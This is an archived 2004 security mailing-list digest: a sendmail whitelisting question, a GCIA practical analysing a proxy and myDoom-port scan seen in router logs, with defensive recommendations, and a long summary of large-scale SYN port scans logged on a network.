From rwagner at eruces.com Thu Jul 1 15:11:10 2004 From: rwagner at eruces.com (Robert Wagner) Date: Thu, 1 Jul 2004 10:11:10 -0500 Subject: [Intrusions] Sendmail whitelists Message-ID: I was wondering if anyone has come up with a good method for creating a whitelist on a sendmail gateway? -Background: I have been running sendmail successfully for a while. I am interested in locking down a mail gateway a bit further. Currently, mail comes in from the outside, through a gateway, then on to a final mailserver. The problem is with spam, since the gateway just looks at the domain and then relays (access file) the mail inside. If the user doesn't exist, the internal server then tries to return the mail. I would like to create a whitelist of known email addresses, so only they get passed through. Bad email addresses are stopped/rejected at the gateway. I see how to reject bad addresses, but there are an unlimited amount of these. The problem is the relay command in the access file only works for the entire domain. Is there a simple method for doing this? Someone mentioned: define(`_RELAY_FULL_ADDR_', `1') But I cannot find any information on where this will work and what exactly it does. From jscott at rolenstarsupply.com Thu Jul 1 22:54:48 2004 From: jscott at rolenstarsupply.com (jscott at rolenstarsupply.com) Date: Thu, 1 Jul 2004 17:54:48 -0500 Subject: [Intrusions] LOGS: GIAC GCIA Version 3.5 Practical Detect Jeremy Scott Message-ID: <000d01c45fbe$69694c70$6501a8c0@cyborg> Network Detect 2: Proxy scan Jun 20 00:00:00 tcp 216.232.9.229(1422) xxx.xxx.xxx.231(3127), denied Jun 20 00:00:06 tcp 220.99.138.166(4867) xxx.xxx.xxx.35(3127), denied Jun 20 00:00:08 tcp 220.99.138.166(4738) xxx.xxx.xxx.37(3127), denied Jun 20 00:00:08 icmp 217.88.124.253 xxx.xxx.xxx.221 denied Jun 20 00:00:14 tcp 220.99.138.166(3208) xxx.xxx.xxx.35(3128), denied Jun 20 00:00:16 tcp 216.232.9.229(1690) xxx.xxx.xxx.231(1080), denied 1. Source of Trace: This was taken from the external router log produced on my company network. Our intrusion detection is within the external router; therefore, no other logs are available to correlate the data. The internal IP addresses have been obfuscated for security reasons. 2. Detect was generated by: Self observation of the external router logs pulled on a daily basis. Looking at the logs for signs of malicious behavior by hand can be tedious but there can also be a wealth of knowledge in what is happening just outside your border. Here is a compiled example of the scan: Access Attempts logged By MY_ROUTER Mon Day Time Type Source Address (Port) Destination Address (Port) --- -- Jun 20 00:00:06 tcp 220.99.138.166(4867) xxx.xxx.xxx.35(3127), denied Jun 20 00:00:06 tcp 220.99.138.166(4867) xxx.xxx.xxx.35(3127), denied Jun 20 00:00:06 tcp 220.99.138.166(4867) xxx.xxx.xxx.35(3127), denied Jun 20 00:00:22 tcp 220.99.138.166(3486) xxx.xxx.xxx.35(1080), denied Jun 20 00:00:40 tcp 220.99.138.166(4068) xxx.xxx.xxx.36(3128), denied Jun 20 00:01:01 tcp 220.99.138.166(4738) xxx.xxx.xxx.37(3127), denied Jun 20 00:01:28 tcp 220.99.138.166(3825) xxx.xxx.xxx.40(3128), denied Jun 20 00:01:36 tcp 220.99.138.166(4105) xxx.xxx.xxx.40(1080), denied Jun 20 00:01:44 tcp 220.99.138.166(4382) xxx.xxx.xxx.41(3127), denied Jun 20 00:01:52 tcp 220.99.138.166(4869) xxx.xxx.xxx.41(3128), denied Jun 20 00:01:58 tcp 220.99.138.166(3825) xxx.xxx.xxx.40(3128), denied Jun 20 00:02:04 tcp 220.99.138.166(4105) xxx.xxx.xxx.40(1080), denied Jun 20 00:02:24 tcp 220.99.138.166(3209) xxx.xxx.xxx.41(1080), denied Jun 20 00:02:40 tcp 220.99.138.166(3507) xxx.xxx.xxx.42(3127), denied Jun 20 00:02:53 tcp 220.99.138.166(4053) xxx.xxx.xxx.42(1080), denied Jun 20 00:03:02 tcp 220.99.138.166(4326) xxx.xxx.xxx.43(3127), denied Jun 20 00:03:04 tcp 220.99.138.166(3698) xxx.xxx.xxx.44(3128), denied Jun 20 00:03:11 tcp 220.99.138.166(4727) xxx.xxx.xxx.43(3128), denied Jun 20 00:03:16 tcp 220.99.138.166(3427) xxx.xxx.xxx.44(3127), denied Jun 20 00:03:28 tcp 220.99.138.166(3698) xxx.xxx.xxx.44(3128), denied Jun 20 00:03:33 tcp 220.99.138.166(3970) xxx.xxx.xxx.44(1080), denied Jun 20 00:03:52 tcp 220.99.138.166(4247) xxx.xxx.xxx.45(3127), denied Jun 20 00:04:00 tcp 220.99.138.166(4629) xxx.xxx.xxx.45(3128), denied Jun 20 00:04:17 tcp 220.99.138.166(3345) xxx.xxx.xxx.46(3127), denied Jun 20 00:04:30 tcp 220.99.138.166(3902) xxx.xxx.xxx.46(1080), denied Jun 20 00:04:37 tcp 220.99.138.166(4176) xxx.xxx.xxx.47(3127), denied Jun 20 00:04:48 tcp 220.99.138.166(4969) xxx.xxx.xxx.47(1080), denied Jun 20 00:05:04 tcp 220.99.138.166(3554) xxx.xxx.xxx.48(3128), denied 3. Probability the source address was spoofed: Since there were no other logs to correlate the data to, I can't tell if the packets have any signs of crafting. However, because of the ports that are being scanned the source address is probably real. Source Address - The source address is 220.99.138.166. If you do a whois on the IP address, you will be returned with the following information from APNIC. % [whois.apnic.net node-1]% Whois data copyright terms http://www.apnic.net/db/dbcopyright.htmlinetnum: 220.96.0.0 - 220.99.255.255netname: OCN-JPNIC-JPdescr: OCN Provided By NTT-Communications which is ISPdescr: in Chiyoda-ku, Tokyo, Japancountry: JPadmin-c: JNIC1-APtech-c: JNIC1-APremarks: ************************************************remarks: Allocated to JPNIC member. Authoritativeremarks: information regarding assignments and allocationremarks: made from within this block can also be queriedremarks: at whois.nic.ad.jp. To obtain an English outputremarks: query whois -h whois.nic.ad.jp x.x.x.x/eremarks: Email address for spam or abuse complaints : abuse at ocn.ad.jpremarks: ************************************************mnt-by: MAINT-JPNICmnt-lower: MAINT-JPNICchanged: hm-changed at apnic.net 20020904changed: ip-apnic at nic.ad.jp 20040413status: ALLOCATED PORTABLEsource: APNICrole: Japan Network Information Centeraddress: Kokusai-Kougyou-Kanda Bldg 6F, 2-3-4 Uchi-Kandaaddress: Chiyoda-ku, Tokyo 101-0047, Japancountry: JPphone: +81-3-5297-2311fax-no: +81-3-5297-2312e-mail: hostmaster at nic.ad.jpadmin-c: SS13-APtech-c: SY7-APnic-hdl: JNIC1-APmnt-by: MAINT-JPNICchanged: apnic-ftp at nic.ad.jp 19990629changed: ip-staff at nic.ad.jp 20030806source: APNICinetnum: 220.99.128.0 - 220.99.255.255netname: PLALAdescr: Plala Networks Inc.country: JPadmin-c: MN2905JPtech-c: HS3694JPremarks: This information has been partially mirrored by APNIC fromremarks: JPNIC. To obtain more specific information, please use theremarks: JPNIC whois server at whois.nic.ad.jp. (This defaults toremarks: Japanese output, use the /e switch for English output)changed: apnic-ftp at nic.ad.jp 20030203remarks: This information has been partially mirrored by APNIC fromremarks: JPNIC. To obtain more specific information, please use theremarks: JPNIC whois server at whois.nic.ad.jp. (This defaults toremarks: Japanese output, use the /e switch for English output)changed: apnic-ftp at nic.ad.jp 20040609source: JPNIC In that it is a valid IP address according to APNIC and the ports that are being probed may return some type of response to allow the hacker to gain access to the system leads me to believe that the IP address is not spoofed. 4. Description of attack: The attack is obviously a scan for Socks and squid proxies in attempt to locate a compromised system or one that is running the service to exploit possible vulnerabilities within the service. A CVE that covers the squid proxy vulnerability can be found at the following URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0068 A CAN, which is under review at this time, that covers the socks proxy vulnerability can be found at the following URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0315 Along with the proxies, the attacker appears to be probing for port 3127. This port is left open as a back door by the myDoom virus[1] which in future could be an avenue for a denial of service attack in the future, according to CERT at http://www.cert.org/incident_notes/IN-2004-01.html. 5. Attack mechanism: The attacker is probing the network in search of responding ports. Since there are no other logs to correlate with, I can only assume that the TCP packets that are being sent are to elicit some response to find a listening or compromised host. For example, the attacker sends an unsolicited TCP packet with the ACK flag set. The normal response would be for the host to respond back with RST. If that is indeed the case, the attacker now knows that: 1) the host is alive and listening, and 2) there is no filtering in place. If the attacker receives no response then he can assume: 1) some type of filtering is in place, or 2) that the host is not alive. If the attacker receives the response that is being solicited then he can attempt to exploit the vulnerabilities with a buffer overflow using specially crafted packets. In the case of the back door left by the myDoom virus, the attacker could possible take control of that system to launch a denial of service attack. 6. Correlations: I found a posting at http://lists.sans.org/pipermail/unisog/2004-March/006955.php that states that they had seen some scans, particularly on the weekends, just a couple of months back. I was unable to see any other postings to correlate my findings. 7. Evidence of active targeting: It appears to be targeted in the sense that it is targeting three specific ports as possible back doors to compromised systems. Also, the attacker is scanning the full range of addresses on this particular subnet. The scans are not rapid in succession but fairly consistent. 8. Severity: severity = (criticality + lethality) - (system countermeasures + network countermeasures) Each value is ranked on a scale from 1 (lowest) to 5 (highest). Criticality: 2 I believe that criticality is low based on the fact that we do not run socks or squid proxies on our network. It is possible that the myDoom virus could be introduced but active virus scanning with updated definitions is in use. Lethality: 3 I do not think that this scan in itself is very lethal but the nature of business on my network a compromise could be very lethal. A continued monitoring of this type of scan and any other associated IP addresses should be considered. System countermeasures: 2 The systems on this network are patched and updated regularly or as they become available. The systems administrators do a fair job of ensuring that the systems are secure and up to date. Network countermeasures: 3 I am happy to say that this scan was denied at the border router. The network currently uses a defense-in-depth approach. Inside the border router, using extensive ACLs, is monitored by a network IDS. A firewall is then in place that all traffic to the internal network is routed through. The internal network is monitored by multiple network IDS on various segments along with Cisco IDS modules in the switches. Correlation with various agencies allows us to put preventative measures up at the border ahead of time. 9. Defensive Recommendations: The border router should be configured to block incoming requests for services that are not in use or vulnerable to remote access. If the scan is coming from a specific host, then that IP address can be blocked at the router. Firewalls, should also be set to block any unused services. Since the scan also includes the port commonly associated with the myDoom virus, a full system scan with updated definitions should be done on all systems to ensure that none of the systems have been compromised. 10. Multiple choice test question: What range of ports does the myDoom virus open up and listen on? a. 4200-4000 b. 3127-3198 c. 1024-1029 d. 135-139 Answer: b. A system that has been compromised by the myDoom virus opens ports 3127-3198, according to CERT http://www.cert.org/incident_notes/IN-2004-01.html. -------------------------------------------------------------------------------- [1] LinkLogger From Ken.Connelly at uni.edu Thu Jul 1 19:07:45 2004 From: Ken.Connelly at uni.edu (Ken.Connelly at uni.edu) Date: Thu, 01 Jul 2004 14:07:45 -0500 (CDT) Subject: [Intrusions] [LOGS] Summary of large-scale portscanning detects Message-ID: <01LBY7AKXD908YCRLC@uni.edu> The following extracts show the beginning and ending of scan activity was detected on my network. The number following each set is the total number of probes for that source. Timestamps are GMT-0500. Jun 30 05:56:44 82.66.34.37:22002 -> xxx.yyy.1.0:3127 SYN ******S* Jun 30 05:56:44 82.66.34.37:22002 -> xxx.yyy.1.0:1080 SYN ******S* Jun 30 05:56:44 82.66.34.37:22002 -> xxx.yyy.1.0:10080 SYN ******S* Jun 30 05:56:44 82.66.34.37:22002 -> xxx.yyy.1.0:3128 SYN ******S* Jun 30 05:56:44 82.66.34.37:22002 -> xxx.yyy.1.1:3127 SYN ******S* Jun 30 05:56:44 82.66.34.37:22002 -> xxx.yyy.1.1:1080 SYN ******S* Jun 30 05:56:45 82.66.34.37:22002 -> xxx.yyy.1.1:10080 SYN ******S* Jun 30 05:56:45 82.66.34.37:22002 -> xxx.yyy.1.1:3128 SYN ******S* [...] Jun 30 12:41:43 82.66.34.37:22002 -> xxx.yyy.221.193:3128 SYN ******S* Jun 30 12:41:43 82.66.34.37:22002 -> xxx.yyy.221.194:3127 SYN ******S* Jun 30 12:41:43 82.66.34.37:22002 -> xxx.yyy.221.194:1080 SYN ******S* Jun 30 12:41:43 82.66.34.37:22002 -> xxx.yyy.221.194:10080 SYN ******S* Jun 30 12:41:43 82.66.34.37:22002 -> xxx.yyy.221.194:3128 SYN ******S* Jun 30 12:41:43 82.66.34.37:22002 -> xxx.yyy.221.195:3127 SYN ******S* Jun 30 12:41:44 82.66.34.37:22002 -> xxx.yyy.221.195:1080 SYN ******S* Jun 30 12:41:44 82.66.34.37:22002 -> xxx.yyy.221.195:10080 SYN ******S* Jun 30 12:41:45 82.66.34.37:22002 -> xxx.yyy.221.195:3128 SYN ******S* 138896 Jun 30 13:26:13 82.36.61.4:2305 -> xxx.yyy.1.0:1433 SYN ******S* Jun 30 13:26:13 82.36.61.4:2309 -> xxx.yyy.1.1:1433 SYN ******S* Jun 30 13:26:10 82.36.61.4:2311 -> xxx.yyy.1.2:1433 SYN ******S* Jun 30 13:26:13 82.36.61.4:2314 -> xxx.yyy.1.3:1433 SYN ******S* Jun 30 13:26:13 82.36.61.4:2316 -> xxx.yyy.1.4:1433 SYN ******S* Jun 30 13:26:13 82.36.61.4:2317 -> xxx.yyy.1.5:1433 SYN ******S* Jun 30 13:26:13 82.36.61.4:2319 -> xxx.yyy.1.6:1433 SYN ******S* Jun 30 13:26:13 82.36.61.4:2323 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jun 30 17:15:18 82.36.61.4:1637 -> xxx.yyy.255.249:1433 SYN ******S* Jun 30 17:15:18 82.36.61.4:1649 -> xxx.yyy.255.250:1433 SYN ******S* Jun 30 17:15:18 82.36.61.4:1626 -> xxx.yyy.255.248:1433 SYN ******S* Jun 30 17:15:18 82.36.61.4:1629 -> xxx.yyy.255.247:1433 SYN ******S* Jun 30 17:15:19 82.36.61.4:1689 -> xxx.yyy.255.251:1433 SYN ******S* Jun 30 17:15:20 82.36.61.4:1814 -> xxx.yyy.255.252:1433 SYN ******S* Jun 30 17:15:20 82.36.61.4:1866 -> xxx.yyy.255.253:1433 SYN ******S* Jun 30 17:15:20 82.36.61.4:1875 -> xxx.yyy.255.254:1433 SYN ******S* 119023 Jun 30 14:38:30 218.64.88.131:4630 -> xxx.yyy.1.0:139 SYN ******S* Jun 30 14:38:30 218.64.88.131:4634 -> xxx.yyy.1.2:139 SYN ******S* Jun 30 14:38:27 218.64.88.131:4635 -> xxx.yyy.1.3:139 SYN ******S* Jun 30 14:38:30 218.64.88.131:4636 -> xxx.yyy.1.4:139 SYN ******S* Jun 30 14:38:30 218.64.88.131:4637 -> xxx.yyy.1.5:139 SYN ******S* Jun 30 14:38:30 218.64.88.131:4638 -> xxx.yyy.1.6:139 SYN ******S* Jun 30 14:38:30 218.64.88.131:4639 -> xxx.yyy.1.7:139 SYN ******S* Jun 30 14:38:30 218.64.88.131:4640 -> xxx.yyy.1.8:139 SYN ******S* [...] Jun 30 15:02:57 218.64.88.131:2504 -> xxx.yyy.255.246:139 SYN ******S* Jun 30 15:02:57 218.64.88.131:2505 -> xxx.yyy.255.247:139 SYN ******S* Jun 30 15:02:57 218.64.88.131:2509 -> xxx.yyy.255.249:139 SYN ******S* Jun 30 15:02:57 218.64.88.131:2510 -> xxx.yyy.255.250:139 SYN ******S* Jun 30 15:02:57 218.64.88.131:2506 -> xxx.yyy.255.248:139 SYN ******S* Jun 30 15:02:57 218.64.88.131:2514 -> xxx.yyy.255.254:139 SYN ******S* Jun 30 15:02:57 218.64.88.131:2513 -> xxx.yyy.255.253:139 SYN ******S* Jun 30 15:02:57 218.64.88.131:2511 -> xxx.yyy.255.251:139 SYN ******S* 102359 Jun 30 20:24:55 195.120.208.35:1672 -> xxx.yyy.1.1:8000 SYN ******S* Jun 30 20:24:55 195.120.208.35:1673 -> xxx.yyy.1.2:8000 SYN ******S* Jun 30 20:24:55 195.120.208.35:1674 -> xxx.yyy.1.3:8000 SYN ******S* Jun 30 20:24:56 195.120.208.35:1675 -> xxx.yyy.1.4:8000 SYN ******S* Jun 30 20:24:56 195.120.208.35:1676 -> xxx.yyy.1.5:8000 SYN ******S* Jun 30 20:24:56 195.120.208.35:1678 -> xxx.yyy.1.7:8000 SYN ******S* Jun 30 20:24:56 195.120.208.35:1677 -> xxx.yyy.1.6:8000 SYN ******S* Jun 30 20:24:56 195.120.208.35:1679 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jun 30 20:32:35 195.120.208.35:4588 -> xxx.yyy.255.234:8000 SYN ******S* Jun 30 20:32:35 195.120.208.35:4598 -> xxx.yyy.255.244:8000 SYN ******S* Jun 30 20:32:35 195.120.208.35:4595 -> xxx.yyy.255.241:8000 SYN ******S* Jun 30 20:32:35 195.120.208.35:4602 -> xxx.yyy.255.247:8000 SYN ******S* Jun 30 20:32:35 195.120.208.35:4585 -> xxx.yyy.255.231:8000 SYN ******S* Jun 30 20:32:35 195.120.208.35:4579 -> xxx.yyy.255.225:8000 SYN ******S* Jun 30 20:32:35 195.120.208.35:4576 -> xxx.yyy.255.222:8000 SYN ******S* Jun 30 20:32:35 195.120.208.35:4592 -> xxx.yyy.255.238:8000 SYN ******S* 74859 Jun 30 19:29:37 171.64.128.185:3714 -> xxx.yyy.1.1:1433 SYN ******S* Jun 30 19:29:37 171.64.128.185:3715 -> xxx.yyy.1.2:1433 SYN ******S* Jun 30 19:29:37 171.64.128.185:3716 -> xxx.yyy.1.3:1433 SYN ******S* Jun 30 19:29:37 171.64.128.185:3717 -> xxx.yyy.1.4:1433 SYN ******S* Jun 30 19:29:34 171.64.128.185:3720 -> xxx.yyy.1.5:1433 SYN ******S* Jun 30 19:29:37 171.64.128.185:3724 -> xxx.yyy.1.7:1433 SYN ******S* Jun 30 19:29:37 171.64.128.185:3725 -> xxx.yyy.1.8:1433 SYN ******S* Jun 30 19:29:37 171.64.128.185:3728 -> xxx.yyy.1.9:1433 SYN ******S* [...] Jun 30 19:41:18 171.64.128.185:3640 -> xxx.yyy.255.248:1433 SYN ******S* Jun 30 19:41:18 171.64.128.185:3629 -> xxx.yyy.255.243:1433 SYN ******S* Jun 30 19:41:18 171.64.128.185:3636 -> xxx.yyy.255.246:1433 SYN ******S* Jun 30 19:41:18 171.64.128.185:3627 -> xxx.yyy.255.241:1433 SYN ******S* Jun 30 19:41:18 171.64.128.185:3651 -> xxx.yyy.255.253:1433 SYN ******S* Jun 30 19:41:18 171.64.128.185:3645 -> xxx.yyy.255.251:1433 SYN ******S* Jun 30 19:41:18 171.64.128.185:3652 -> xxx.yyy.255.254:1433 SYN ******S* Jun 30 19:41:18 171.64.128.185:3646 -> xxx.yyy.255.252:1433 SYN ******S* 71312 Jun 30 14:31:50 218.162.51.8:3359 -> xxx.yyy.1.1:8000 SYN ******S* Jun 30 14:31:49 218.162.51.8:3360 -> xxx.yyy.1.2:8000 SYN ******S* Jun 30 14:31:50 218.162.51.8:3361 -> xxx.yyy.1.3:8000 SYN ******S* Jun 30 14:31:51 218.162.51.8:3363 -> xxx.yyy.1.4:8000 SYN ******S* Jun 30 14:31:48 218.162.51.8:3368 -> xxx.yyy.1.8:8000 SYN ******S* Jun 30 14:31:48 218.162.51.8:3369 -> xxx.yyy.1.9:8000 SYN ******S* Jun 30 14:31:49 218.162.51.8:3376 -> xxx.yyy.1.12:8000 SYN ******S* Jun 30 14:31:50 218.162.51.8:3378 -> xxx.yyy.1.13:8000 SYN ******S* [...] Jun 30 14:54:12 218.162.51.8:3825 -> xxx.yyy.255.244:8000 SYN ******S* Jun 30 14:54:12 218.162.51.8:3827 -> xxx.yyy.255.245:8000 SYN ******S* Jun 30 14:54:12 218.162.51.8:3828 -> xxx.yyy.255.246:8000 SYN ******S* Jun 30 14:54:12 218.162.51.8:3832 -> xxx.yyy.255.249:8000 SYN ******S* Jun 30 14:54:12 218.162.51.8:3835 -> xxx.yyy.255.250:8000 SYN ******S* Jun 30 14:54:12 218.162.51.8:3840 -> xxx.yyy.255.252:8000 SYN ******S* Jun 30 14:54:12 218.162.51.8:3844 -> xxx.yyy.255.253:8000 SYN ******S* Jun 30 14:54:12 218.162.51.8:3845 -> xxx.yyy.255.254:8000 SYN ******S* 70673 Jun 30 14:25:17 195.184.244.66:4652 -> xxx.yyy.1.1:8000 SYN ******S* Jun 30 14:25:17 195.184.244.66:4653 -> xxx.yyy.1.2:8000 SYN ******S* Jun 30 14:25:17 195.184.244.66:4654 -> xxx.yyy.1.3:8000 SYN ******S* Jun 30 14:25:18 195.184.244.66:4655 -> xxx.yyy.1.4:8000 SYN ******S* Jun 30 14:25:18 195.184.244.66:4656 -> xxx.yyy.1.5:8000 SYN ******S* Jun 30 14:25:15 195.184.244.66:4657 -> xxx.yyy.1.6:8000 SYN ******S* Jun 30 14:25:18 195.184.244.66:4658 -> xxx.yyy.1.7:8000 SYN ******S* Jun 30 14:25:18 195.184.244.66:4659 -> xxx.yyy.1.8:8000 SYN ******S* [...] Jun 30 14:36:21 195.184.244.66:3282 -> xxx.yyy.255.245:8000 SYN ******S* Jun 30 14:36:21 195.184.244.66:3286 -> xxx.yyy.255.249:8000 SYN ******S* Jun 30 14:36:21 195.184.244.66:3283 -> xxx.yyy.255.246:8000 SYN ******S* Jun 30 14:36:21 195.184.244.66:3287 -> xxx.yyy.255.250:8000 SYN ******S* Jun 30 14:36:21 195.184.244.66:3279 -> xxx.yyy.255.242:8000 SYN ******S* Jun 30 14:36:21 195.184.244.66:3289 -> xxx.yyy.255.252:8000 SYN ******S* Jun 30 14:36:21 195.184.244.66:3290 -> xxx.yyy.255.253:8000 SYN ******S* Jun 30 14:36:21 195.184.244.66:3291 -> xxx.yyy.255.254:8000 SYN ******S* 69700 Jun 30 13:10:28 211.220.191.241:3221 -> xxx.yyy.1.1:1433 SYN ******S* Jun 30 13:10:25 211.220.191.241:3223 -> xxx.yyy.1.3:1433 SYN ******S* Jun 30 13:10:28 211.220.191.241:3222 -> xxx.yyy.1.2:1433 SYN ******S* Jun 30 13:10:28 211.220.191.241:3224 -> xxx.yyy.1.4:1433 SYN ******S* Jun 30 13:10:28 211.220.191.241:3225 -> xxx.yyy.1.5:1433 SYN ******S* Jun 30 13:10:28 211.220.191.241:3226 -> xxx.yyy.1.6:1433 SYN ******S* Jun 30 13:10:28 211.220.191.241:3227 -> xxx.yyy.1.7:1433 SYN ******S* Jun 30 13:10:28 211.220.191.241:3228 -> xxx.yyy.1.8:1433 SYN ******S* [...] Jun 30 13:22:07 211.220.191.241:1863 -> xxx.yyy.255.242:1433 SYN ******S* Jun 30 13:22:07 211.220.191.241:1864 -> xxx.yyy.255.243:1433 SYN ******S* Jun 30 13:22:07 211.220.191.241:1862 -> xxx.yyy.255.241:1433 SYN ******S* Jun 30 13:22:07 211.220.191.241:1859 -> xxx.yyy.255.238:1433 SYN ******S* Jun 30 13:22:07 211.220.191.241:1868 -> xxx.yyy.255.247:1433 SYN ******S* Jun 30 13:22:07 211.220.191.241:1872 -> xxx.yyy.255.251:1433 SYN ******S* Jun 30 13:22:07 211.220.191.241:1873 -> xxx.yyy.255.252:1433 SYN ******S* Jun 30 13:22:07 211.220.191.241:1870 -> xxx.yyy.255.249:1433 SYN ******S* Jun 30 13:22:07 211.220.191.241:1869 -> xxx.yyy.255.248:1433 SYN ******S* 67746 Jun 30 14:52:24 198.151.149.49:3671 -> xxx.yyy.1.1:7575 SYN ******S* Jun 30 14:52:24 198.151.149.49:3672 -> xxx.yyy.1.2:7575 SYN ******S* Jun 30 14:52:24 198.151.149.49:3673 -> xxx.yyy.1.3:7575 SYN ******S* Jun 30 14:52:26 198.151.149.49:3674 -> xxx.yyy.1.4:7575 SYN ******S* Jun 30 14:52:26 198.151.149.49:3675 -> xxx.yyy.1.5:7575 SYN ******S* Jun 30 14:52:26 198.151.149.49:3676 -> xxx.yyy.1.6:7575 SYN ******S* Jun 30 14:52:26 198.151.149.49:3677 -> xxx.yyy.1.7:7575 SYN ******S* Jun 30 14:52:26 198.151.149.49:3678 -> xxx.yyy.1.8:7575 SYN ******S* [...] Jun 30 15:04:05 198.151.149.49:2477 -> xxx.yyy.255.241:7575 SYN ******S* Jun 30 15:04:05 198.151.149.49:2489 -> xxx.yyy.255.253:7575 SYN ******S* Jun 30 15:04:05 198.151.149.49:2487 -> xxx.yyy.255.251:7575 SYN ******S* Jun 30 15:04:05 198.151.149.49:2486 -> xxx.yyy.255.250:7575 SYN ******S* Jun 30 15:04:05 198.151.149.49:2484 -> xxx.yyy.255.248:7575 SYN ******S* Jun 30 15:04:05 198.151.149.49:2483 -> xxx.yyy.255.247:7575 SYN ******S* Jun 30 15:04:05 198.151.149.49:2488 -> xxx.yyy.255.252:7575 SYN ******S* Jun 30 15:04:05 198.151.149.49:2485 -> xxx.yyy.255.249:7575 SYN ******S* 66270 Jun 30 22:30:14 212.12.244.130:2830 -> xxx.yyy.1.2:1433 SYN ******S* Jun 30 22:30:17 212.12.244.130:2832 -> xxx.yyy.1.4:1433 SYN ******S* Jun 30 22:30:14 212.12.244.130:2833 -> xxx.yyy.1.5:1433 SYN ******S* Jun 30 22:30:17 212.12.244.130:2835 -> xxx.yyy.1.7:1433 SYN ******S* Jun 30 22:30:17 212.12.244.130:2836 -> xxx.yyy.1.8:1433 SYN ******S* Jun 30 22:30:17 212.12.244.130:2837 -> xxx.yyy.1.9:1433 SYN ******S* Jun 30 22:30:17 212.12.244.130:2838 -> xxx.yyy.1.10:1433 SYN ******S* Jun 30 22:30:17 212.12.244.130:2839 -> xxx.yyy.1.11:1433 SYN ******S* [...] Jun 30 22:41:36 212.12.244.130:1652 -> xxx.yyy.255.241:1433 SYN ******S* Jun 30 22:41:36 212.12.244.130:1653 -> xxx.yyy.255.242:1433 SYN ******S* Jun 30 22:41:36 212.12.244.130:1664 -> xxx.yyy.255.253:1433 SYN ******S* Jun 30 22:41:36 212.12.244.130:1660 -> xxx.yyy.255.249:1433 SYN ******S* Jun 30 22:41:36 212.12.244.130:1665 -> xxx.yyy.255.254:1433 SYN ******S* Jun 30 22:41:36 212.12.244.130:1662 -> xxx.yyy.255.251:1433 SYN ******S* Jun 30 22:41:36 212.12.244.130:1663 -> xxx.yyy.255.252:1433 SYN ******S* Jun 30 22:41:36 212.12.244.130:1661 -> xxx.yyy.255.250:1433 SYN ******S* 60069 Jun 30 06:06:57 218.34.88.4:1762 -> xxx.yyy.1.0:1433 SYN ******S* Jun 30 06:06:57 218.34.88.4:1763 -> xxx.yyy.1.1:1433 SYN ******S* Jun 30 06:06:57 218.34.88.4:1764 -> xxx.yyy.1.2:1433 SYN ******S* Jun 30 06:06:57 218.34.88.4:1765 -> xxx.yyy.1.3:1433 SYN ******S* Jun 30 06:06:57 218.34.88.4:1766 -> xxx.yyy.1.4:1433 SYN ******S* Jun 30 06:06:57 218.34.88.4:1767 -> xxx.yyy.1.5:1433 SYN ******S* Jun 30 06:06:57 218.34.88.4:1769 -> xxx.yyy.1.6:1433 SYN ******S* Jun 30 06:06:54 218.34.88.4:1772 -> xxx.yyy.1.7:1433 SYN ******S* [...] Jun 30 08:24:28 218.34.88.4:4987 -> xxx.yyy.154.73:1433 SYN ******S* Jun 30 08:24:28 218.34.88.4:4991 -> xxx.yyy.154.76:1433 SYN ******S* Jun 30 08:24:28 218.34.88.4:1265 -> xxx.yyy.154.85:1433 SYN ******S* Jun 30 08:24:28 218.34.88.4:4994 -> xxx.yyy.154.77:1433 SYN ******S* Jun 30 08:24:28 218.34.88.4:1270 -> xxx.yyy.154.86:1433 SYN ******S* Jun 30 08:24:28 218.34.88.4:1026 -> xxx.yyy.154.79:1433 SYN ******S* Jun 30 08:24:28 218.34.88.4:4999 -> xxx.yyy.154.78:1433 SYN ******S* Jun 30 08:24:28 218.34.88.4:1271 -> xxx.yyy.154.87:1433 SYN ******S* Jun 30 08:24:29 218.34.88.4:1274 -> xxx.yyy.154.89:1433 SYN ******S* 49836 Jun 30 00:02:27 61.152.121.249:10616 -> xxx.yyy.128.5:25 SYN ******S* Jun 30 00:02:27 61.152.121.249:10617 -> xxx.yyy.128.6:25 SYN ******S* Jun 30 00:02:28 61.152.121.249:10851 -> xxx.yyy.128.7:25 SYN ******S* Jun 30 00:02:31 61.152.121.249:11173 -> xxx.yyy.128.10:25 SYN ******S* Jun 30 00:02:28 61.152.121.249:11257 -> xxx.yyy.128.18:25 SYN ******S* Jun 30 00:02:31 61.152.121.249:11260 -> xxx.yyy.128.19:25 SYN ******S* Jun 30 00:02:28 61.152.121.249:11261 -> xxx.yyy.128.15:25 SYN ******S* Jun 30 00:02:28 61.152.121.249:11269 -> xxx.yyy.128.20:25 SYN ******S* [...] Jun 30 00:47:20 61.152.121.249:37377 -> xxx.yyy.255.232:25 SYN ******S* Jun 30 00:47:20 61.152.121.249:37374 -> xxx.yyy.255.233:25 SYN ******S* Jun 30 00:47:20 61.152.121.249:37383 -> xxx.yyy.255.237:25 SYN ******S* Jun 30 00:47:20 61.152.121.249:37415 -> xxx.yyy.255.242:25 SYN ******S* Jun 30 00:47:20 61.152.121.249:37405 -> xxx.yyy.255.241:25 SYN ******S* Jun 30 00:47:20 61.152.121.249:37432 -> xxx.yyy.255.244:25 SYN ******S* Jun 30 00:47:20 61.152.121.249:37483 -> xxx.yyy.255.251:25 SYN ******S* Jun 30 00:47:20 61.152.121.249:37489 -> xxx.yyy.255.253:25 SYN ******S* Jun 30 00:47:20 61.152.121.249:37501 -> xxx.yyy.255.254:25 SYN ******S* 46487 Jun 30 10:29:47 81.84.204.39:3357 -> xxx.yyy.1.0:455 SYN ******S* Jun 30 10:29:47 81.84.204.39:3358 -> xxx.yyy.1.1:455 SYN ******S* Jun 30 10:29:47 81.84.204.39:3359 -> xxx.yyy.1.2:455 SYN ******S* Jun 30 10:29:46 81.84.204.39:3361 -> xxx.yyy.1.4:455 SYN ******S* Jun 30 10:29:47 81.84.204.39:3360 -> xxx.yyy.1.3:455 SYN ******S* Jun 30 10:29:46 81.84.204.39:3362 -> xxx.yyy.1.5:455 SYN ******S* Jun 30 10:29:46 81.84.204.39:3363 -> xxx.yyy.1.6:455 SYN ******S* Jun 30 10:29:46 81.84.204.39:3364 -> xxx.yyy.1.7:455 SYN ******S* [...] Jun 30 12:30:18 81.84.204.39:3494 -> xxx.yyy.254.246:455 SYN ******S* Jun 30 12:30:18 81.84.204.39:3495 -> xxx.yyy.254.247:455 SYN ******S* Jun 30 12:30:18 81.84.204.39:3496 -> xxx.yyy.254.248:455 SYN 